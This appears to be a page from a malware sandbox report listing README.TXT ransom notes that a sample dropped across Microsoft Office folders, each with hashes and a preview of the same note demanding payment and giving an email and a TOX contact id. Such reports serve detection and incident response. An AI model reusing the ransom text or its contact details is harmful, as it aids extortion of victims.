                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Stationery\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Templates\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Templates\Presentation Designs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModel\Cartridges\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModel\Resources\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModel\Resources\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModelv16\Cartridges\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModelv16\Resources\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModelv16\Resources\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\Office Setup Controller\Office.en-us\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Smart Tag\LISTS\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\16\BIN\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\16\BIN\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
